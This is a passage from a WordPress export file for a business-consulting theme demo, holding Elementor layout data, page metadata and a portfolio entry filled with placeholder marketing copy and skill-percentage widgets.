strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c75fefb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bdf3219","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"17353e6","elType":"widget","settings":{"title":"My Soft & Hard Skills","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"318c138","elType":"widget","settings":{"editor":"<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2b3ff2b","elType":"widget","settings":{"cf7":"736","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"30","right":"20","bottom":"30","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:7;s:19:"_inline_size_tablet";i:6;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"heading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:4;s:11:"header_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:2;s:3:"gap";i:3;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:3;s:7:"padding";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:2;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=768</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>768</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[770]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consultation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-consultation/</link>
		<pubDate>Fri, 11 Sep 2020 07:26:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=773</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>773</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:26:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:26:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consultation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3eb71c6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"40279fc","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"f75ccb2","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3fdd108","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"31adc79","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"a1676c3","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"925bd17","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"98d8bcd","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4516c47","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3b7b92a","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c389ea2","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"86fc555","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2bed14d","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f07866b","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"14874f9","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"03b8867","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"47f5968","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"edf6855","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"75336af","elType":"section","settings":[],"elements":[{"id":"e76d4cf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"82f9422","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"35268ca","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4ce881f","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"d3c0ad5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"ac9efe6","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e7d11f3","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a1037bd","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"f83acd7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"18be748","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0f970dd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"97740b0","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e603d4f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"beca259","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e2b20f7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"664dae7","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"6c2f37d","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"d75ae7b","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6bc087a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"c6608cf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"630f199","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"66bd238","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2dcc4a5","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"28f44ac","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
